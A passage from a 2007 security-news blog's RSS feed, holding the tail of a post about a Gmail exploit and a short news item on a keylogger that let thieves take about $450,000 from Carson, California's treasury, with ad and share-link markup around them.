google_ad_slot = "1984834111";
google_ad_width = 300;
google_ad_height = 250;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<!-- Social Bookmarks BEGIN -->
<div class="social_bookmark">
<a title="Click me to see the sites." href="#" onclick="$$('div.d3505').each( function(e) { e.visualEffect('slide_down',{duration:2.5}) }); return false;"><strong><em>Share</em></strong></a>
<br />
<div class="d3505" style="overflow:hidden">
<br />
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F12%2F31%2Fgmail-exploit-aids-domain-hijack%2F&amp;title=Gmail+Exploit+Aids+Domain+Hijack" rel="nofollow" title="Add to&nbsp;Del.icio.us"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/delicious.png" title="Add to&nbsp;Del.icio.us" alt="Add to&nbsp;Del.icio.us" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F12%2F31%2Fgmail-exploit-aids-domain-hijack%2F&amp;title=Gmail+Exploit+Aids+Domain+Hijack" rel="nofollow" title="Add to&nbsp;digg"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/digg.png" title="Add to&nbsp;digg" alt="Add to&nbsp;digg" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F12%2F31%2Fgmail-exploit-aids-domain-hijack%2F" rel="nofollow" title="Add to&nbsp;Facebook"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/facebook.png" title="Add to&nbsp;Facebook" alt="Add to&nbsp;Facebook" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F12%2F31%2Fgmail-exploit-aids-domain-hijack%2F&amp;title=Gmail+Exploit+Aids+Domain+Hijack" rel="nofollow" title="Add to&nbsp;Google Bookmarks"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/google.png" title="Add to&nbsp;Google Bookmarks" alt="Add to&nbsp;Google Bookmarks" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F12%2F31%2Fgmail-exploit-aids-domain-hijack%2F&amp;title=Gmail+Exploit+Aids+Domain+Hijack" rel="nofollow" title="Add to&nbsp;Stumble Upon"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/stumbleupon.png" title="Add to&nbsp;Stumble Upon" alt="Add to&nbsp;Stumble Upon" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home/?status=Check+out+Gmail+Exploit+Aids+Domain+Hijack+@+http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F12%2F31%2Fgmail-exploit-aids-domain-hijack%2F" rel="nofollow" title="Add to&nbsp;Twitter"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/twitter.png" title="Add to&nbsp;Twitter" alt="Add to&nbsp;Twitter" /></a>
<br />
<a style="font-size:90%;text-align: right; " title="Click me to hide the sites." href="#" onclick="$$('div.d3505').each( function(e) { e.visualEffect('slide_up',{duration:0.5}) }); return false;">Hide Sites</a>
</div>
</div>
<!-- Social Bookmarks END -->
]]></content:encoded>
			<wfw:commentRss>http://www.ezrahill.co.uk/2007/12/31/gmail-exploit-aids-domain-hijack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Online thieves nab $450,000 from town coffers</title>
		<link>http://www.ezrahill.co.uk/2007/06/06/online-thieves-nab-450000-from-town-coffers-2/</link>
		<comments>http://www.ezrahill.co.uk/2007/06/06/online-thieves-nab-450000-from-town-coffers-2/#comments</comments>
		<pubDate>Wed, 06 Jun 2007 13:58:26 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tech]]></category>

		<guid isPermaLink="false">http://www.ezrahill.co.uk/?p=810</guid>
		<description><![CDATA[A keylogger on the computer of the Carson, Calif., treasurer enabled online thieves to transfer nearly half a million dollars to other bank accounts, according to news reports. The thieves made two transfers: The first on May 23 for $90,000 and the next for $358,000 on the following day, according to a report in the [...]]]></description>
			<content:encoded><![CDATA[<p><script type="text/javascript"><!--
google_ad_client = "pub-6405211419695752";
google_ad_slot = "1232232141";
google_ad_width = 468;
google_ad_height = 60;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p>A keylogger on the computer of the Carson, Calif., treasurer enabled online thieves to transfer nearly half a million dollars to other bank accounts, according to news reports.</p>
<p>The thieves made two transfers: The first on May 23 for $90,000 and the next for $358,000 on the following day, according to a report in the Los Angeles Times. Carson Treasurer Karen Avilla noticed the transfers on May 24 and, with the help of the town&#8217;s bank, froze all but $45,000 of the money. A computer forensics team from the bank found a Trojan horse on her city-issued laptop, according to a report in ComputerWorld.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6405211419695752";
google_ad_slot = "1984834111";
google_ad_width = 300;
google_ad_height = 250;
//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</p>
<p><script> digg_url = 'http://digg.com/security/Online_thieves_nab_450_000_from_town_coffers_2'; </script><script src="http://digg.com/api/diggthis.js"></script></p>
<p><a href="http://www.securityfocus.com/brief/514">Read more</a></p>
<!-- Social Bookmarks BEGIN -->
<div class="social_bookmark">
<a title="Click me to see the sites." href="#" onclick="$$('div.d810').each( function(e) { e.visualEffect('slide_down',{duration:2.5}) }); return false;"><strong><em>Share</em></strong></a>
<br />
<div class="d810" style="overflow:hidden">
<br />
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://del.icio.us/post?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F06%2F06%2Fonline-thieves-nab-450000-from-town-coffers-2%2F&amp;title=Online+thieves+nab+%24450%2C000+from+town+coffers" rel="nofollow" title="Add to&nbsp;Del.icio.us"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/delicious.png" title="Add to&nbsp;Del.icio.us" alt="Add to&nbsp;Del.icio.us" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F06%2F06%2Fonline-thieves-nab-450000-from-town-coffers-2%2F&amp;title=Online+thieves+nab+%24450%2C000+from+town+coffers" rel="nofollow" title="Add to&nbsp;digg"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/digg.png" title="Add to&nbsp;digg" alt="Add to&nbsp;digg" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F06%2F06%2Fonline-thieves-nab-450000-from-town-coffers-2%2F" rel="nofollow" title="Add to&nbsp;Facebook"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/facebook.png" title="Add to&nbsp;Facebook" alt="Add to&nbsp;Facebook" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.google.com/bookmarks/mark?op=edit&amp;output=popup&amp;bkmk=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F06%2F06%2Fonline-thieves-nab-450000-from-town-coffers-2%2F&amp;title=Online+thieves+nab+%24450%2C000+from+town+coffers" rel="nofollow" title="Add to&nbsp;Google Bookmarks"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/google.png" title="Add to&nbsp;Google Bookmarks" alt="Add to&nbsp;Google Bookmarks" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F06%2F06%2Fonline-thieves-nab-450000-from-town-coffers-2%2F&amp;title=Online+thieves+nab+%24450%2C000+from+town+coffers" rel="nofollow" title="Add to&nbsp;Stumble Upon"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/stumbleupon.png" title="Add to&nbsp;Stumble Upon" alt="Add to&nbsp;Stumble Upon" /></a>
<a onclick="window.open(this.href, '_blank', 'scrollbars=yes,menubar=no,height=600,width=750,resizable=yes,toolbar=no,location=no,status=no'); return false;" href="http://twitter.com/home/?status=Check+out+Online+thieves+nab+%24450%2C000+from+town+coffers+@+http%3A%2F%2Fwww.ezrahill.co.uk%2F2007%2F06%2F06%2Fonline-thieves-nab-450000-from-town-coffers-2%2F" rel="nofollow" title="Add to&nbsp;Twitter"><img class="social_img" src="http://www.ezrahill.co.uk/wp-content/plugins/social-bookmarks/images/twitter.png" title="Add to&nbsp;Twitter" alt="Add to&nbsp;Twitter" /></a>
<br />
<a style="font-size:90%;text-align: right; " title="Click me to hide the sites." href="#" onclick="$$('div.d810').each( function(e) { e.visualEffect('slide_up',{duration:0.5}) }); return false;">Hide Sites</a>
</div>
</div>
<!-- Social Bookmarks END -->
]]></content:encoded>
			<wfw:commentRss>http://www.ezrahill.co.uk/2007/06/06/online-thieves-nab-450000-from-town-coffers-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

